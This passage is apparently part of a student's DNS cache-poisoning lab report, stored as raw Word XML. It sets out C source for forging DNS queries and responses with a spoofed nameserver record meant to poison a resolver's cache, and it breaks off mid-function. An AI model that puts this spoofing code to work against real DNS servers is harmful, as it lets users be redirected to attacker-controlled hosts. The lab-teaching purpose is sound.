      <w:r w:rsidR="005B34AE">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>This means</w:t>
      </w:r>
      <w:r w:rsidR="005B34AE">
        <w:t xml:space="preserve"> our attack is successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CABBD1" w14:textId="77777777" w:rsidR="005B34AE" w:rsidRDefault="005B34AE" w:rsidP="0020196F">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="723E40FC" w14:textId="7214DF47" w:rsidR="005B34AE" w:rsidRPr="00524E4C" w:rsidRDefault="005B34AE" w:rsidP="00524E4C">
      <w:r>
        <w:t>The fo</w:t>
      </w:r>
      <w:r w:rsidR="006C61F6">
        <w:t>llowing is my code</w:t>
      </w:r>
      <w:r w:rsidR="00855997">
        <w:t xml:space="preserve"> of the DNS attack program</w:t>
      </w:r>
      <w:r w:rsidR="00276512">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006660F9">
        <w:t xml:space="preserve"> One thing needs to notice, the source IP address and destination IP address of DNS query packet are hard code, they are 10.0.2.20 (VM1, attacker) and 10.0.2.21 (VM2, DNS server). And the source IP address and destination IP address of DNS response packets need to be input by the attacker in the command line.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6476B64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----udp.c------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393CEC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55A1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This sample program must be run by root lol! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D23B50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DE5A64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E29346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CB62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The program is to spoofing tons of different queries to the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E974C3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D53C1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Use wireshark to study the packets. However, it is not enough for </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0128D9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738D1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the lab, please finish the response packet and complete the task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BDE2F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4BA3DB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DDAAD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DF0818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Compile command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA6F0F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576048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gcc -lpcap udp.c -o udp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B99552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463F7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A10724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FC80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8E4551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AA1193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1502B5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B9C825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&lt;unistd.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4087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C98B2F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&lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7917BC4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E9EA8E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&lt;sys/socket.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C1F6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70E74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&lt;netinet/ip.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009BA6F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E60162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&lt;netinet/udp.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773FF07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AF950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&lt;fcntl.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799E02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DE4C1F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&lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF2849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D5567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&lt;errno.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2063FE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71846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&lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3943237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FB3F9B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#include &lt;libnet.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16800D3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87DD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3A44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26C61D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packet length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F1C1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F8720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#define PCKT_LEN 8192</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF7C5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72764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#define FLAG_R 0x8400</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7330BB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91C23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#define FLAG_Q 0x0100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D5B95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333F8E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BE075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D09C47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*TARGET_DOMAIN = "\7example\3com"; // target domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC3C05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B65D5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*ANSWER_IPADDR = "1.1.1.1"; // a forged IP address, no useful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492697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880E1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*SUB_DOMAIN = "\5aaaaa\7example\3com"; // format of subdomain will be used in the attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33603F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5F2B64" w14:textId="30F83F3E"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*NS_SERVER = "\2ns\16dnslabattacker\3net"; // the name</w:t>
      </w:r>
      <w:r w:rsidR="008E2497">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>server address of the attacker, which will be poisoned in the DNS server cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74105D1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2D10DCF" w14:textId="3F0B46DC"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*NS_IPADDR = "1.1.1.1"; // IP address of the attacker name</w:t>
      </w:r>
      <w:r w:rsidR="008E2497">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>server, set in the additional section, but no useful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190B83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CC6C3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260A03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F06D0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Can create separate header file (.h) for all headers' structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35944F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B07D8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ECC578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465AF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IP header's structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561D75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329D94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ipheader {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378125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7B11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C48F4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5D63DD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char      iph_ihl:4, iph_ver:4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170F09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6F49C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126BCB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6229D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char      iph_tos;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F212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9C989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3AD446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25E6C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iph_len;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E13457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5C08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9BEC1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6013CE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unsigned short int iph_ident;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48897B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D47355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FD6ACE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9B36F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unsigned char      iph_flag;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CC8F4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A183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iph_offset;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542DE8B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4557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F2E10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4165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char      iph_ttl;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E88C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C6015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D1668A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FBA93C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char      iph_protocol;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C43ED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AAAA5A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FA0D2D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7C4D17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iph_chksum;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A513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EFE1C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CB68A8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1EC5BA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iph_sourceip;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538488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E6C121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2FF96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241C1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iph_destip;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB1DB5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39034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73FB7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260210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E01F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D2FD0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UDP header's structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4CD2B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3BBFF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udpheader {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533F734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35D5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03BAD1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C6C22D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udph_srcport;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B82A4D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DFAD89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542F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7A21FF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udph_destport;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B1526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AB2DCB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AC9FAC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1A7454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udph_len;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691A185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92500D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B9D671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089697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udph_chksum;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229F37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114570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45B31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98675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6C208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D53B9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dnsheader {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5B9A9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445ABE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E0A7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87706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query_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692F313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80737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4DB27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8FCF9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flags;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561B45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F506AB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B1AA14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AA26F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QDCOUNT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A69E0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09AF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29392B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26F759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ANCOUNT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FF84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9CC0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8E5D7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A4E95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NSCOUNT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9958A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7EB932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37922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936E2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ARCOUNT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A24F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2C16CE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7B358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EC065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total udp header length: 8 bytes (=64 bits)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F7B0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A2E48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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>checksum(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>uint16_t *usBuff, int isize){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8ED9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F46D8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cksum=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDF36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4CAA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2391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92D0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for</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(;isize</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>&gt;1;isize-=2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3763B2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D366E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72009C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324114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cksum+=*usBuff++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B79F8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4706DA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82BE83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79C2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531485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EB136D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F913B3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19932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if(isize==</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0D25CA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C7094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7BCE89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533375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cksum+=*(uint16_t </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>*)usBuff</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DE68E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76A780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A8A5F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8F15A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13FCD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7C78C5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D5FAF0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ACAC66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(cksum);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702A715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74A6C6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D2E3B0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19B8CE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77962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6C271C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calculate udp checksum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C949CC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4ED6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uint16_t check_udp_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sum(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>uint8_t *buffer, int len){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0779A2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058314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266F47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2BD4F4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long sum=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239611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F35F79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467F09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286769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ipheader *tempI</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struct ipheader *)(buffer);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7FC0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F067D2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6FB2F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68C3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udpheader *tempH</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struct udpheader *)(buffer+sizeof(struct ipheader));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47191E6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9B0A04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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7800859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1324D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dnsheader *tempD</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struct dnsheader *)(buffer+sizeof(struct ipheader)+sizeof(struct udpheader));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447829B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E5F9E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1B0B5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33F7E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tempH-&gt;udph_chksum=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F0E3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54A16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65FD4F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7A4D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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>checksum( (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>uint16_t *)   &amp;(tempI-&gt;iph_sourceip) ,8 );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEC562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8B103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9E446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6E73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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>checksum(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(uint16_t *) tempH,len);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494E0B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2BCD2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56A0D0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82F1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sum+=ntohs(IPPROTO_UDP+len);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A69575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648114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5CB94F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E1F200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sum=(sum&gt;&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>16)+(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sum &amp; 0x0000ffff);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1D55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6269F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D8749C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A26EBA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sum+=(sum&gt;&gt;16);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422A55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D10C48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74F69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9B78E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(uint16_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>t)(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>~sum);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737AFB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11604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5A89BE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72BC2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A8CA9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2717D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Function for checksum calculation. From the RFC,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DC956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75C206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452F7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E0DC7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checksum algorithm is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3677F6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34A1AE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CF6DA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19C4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  "</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>The checksum field is the 16 bit one's complement of the one's</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2887DD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F37E20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E65F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9FC365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  complement</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> sum of all 16 bit words in the header.  For purposes of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBC5BA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14DF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FC27C1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1F67C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  computing</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> the checksum, the value of the checksum field is zero."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DD2D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E149F4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82E98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A2BA7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csum(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">unsigned short *buf, int nwords){  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D8873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C7A82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A8B17A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517CEB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long sum;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D631D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7A0B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0893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1811A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for(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sum=0; nwords&gt;0; nwords--)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D69E7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DB07D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 += *buf++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C92DB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BEB47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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2B95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F18A41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 = (sum &gt;&gt; 16) + (sum &amp;0xffff);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5B2B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793E84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043264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20C2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sum += (sum &gt;&gt; 16);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D9EA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F3CD5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01917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B920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(unsigned </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>short)(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>~sum);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5218B4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8D5BC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ABDE4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1FDA85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B2FDE7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676FC7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//this function is used to fill up the question section of DNS query/response packet </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC0044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A71B1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set_Q_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char *buffer, char *name){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BCD9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6016E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001CB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FEED0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//get the current pointer position in the buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B0BC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22CCD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*p = buffer; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC4EC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B2FCF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domain name in to the buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799E73C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ECD7FF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strcpy(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>p, name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB3611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8A00C2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strlen(name) + 1; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFE8CA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67D3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record type into buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182E17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B3B53A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(0x0001);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E057D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AA4C5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173F7BD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97F104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class into buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA0EC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AA2BF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(0x0001);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408CB6E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5287E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063563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2A3A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the current pointer position in the buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7425077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B9C7C7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(p - buffer);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5F63B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F80CA0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AD26B7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72A68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A6B56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2DA5F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//this function is used to fill up the answer/additional section of DNS response packet </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8E8CB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B817F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set_A_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char *buffer, char *name, char offset, char *ip_addr){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7BA13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E48FF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273365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8F98C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//get the current pointer position in the buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089DD68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A3B9D2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*p = buffer; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C08F6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E566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1A248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9C933A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domain name in to the buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CEC45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54E119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name == NULL){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F04E61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FB778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0xC0; p++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F24CC2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B9062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offset; p++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622CF3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8796A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9AA596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733D5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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9BF5C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C3185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strcpy(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>p, name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CDEE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137195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strlen(name) + 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D465D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453C24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C50B0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998D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3E4488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7BE41F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record type into buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F4CCE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64F07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(0x0001);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156AC4F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C127A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2BF0049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1EBD5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class into buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F58BA7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F685A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(0x0001);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11714AE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25267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6E6B3A7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AF73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time to live into buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDC8E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48901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htonl (0x00002000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CBF64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0B4DA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4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5522503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06BB7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data length into buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F71568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A12A4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(0x0004);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583B132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D5AE7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5379CB7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27FE49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domain IP address into buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F71ED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B5A2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in_addr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-&gt;s_addr = inet_addr(ip_addr);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631629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44BCB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4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC8861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CD0A9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the current pointer position in the buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1CA5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8067E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(p - buffer);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C23CAF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42EED5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75389C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ADA78F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A5F0FA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E8E39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//this function is used to fill up the authority section of DNS response packet </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60701B3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D083C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set_NS_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char *buffer, char *domain_name, char offset, char *server_name){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255BC2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51FE4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095A1A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767105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*p = buffer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EA5B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B5F21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domain name in to buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23142A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7ACEBF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strcpy(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
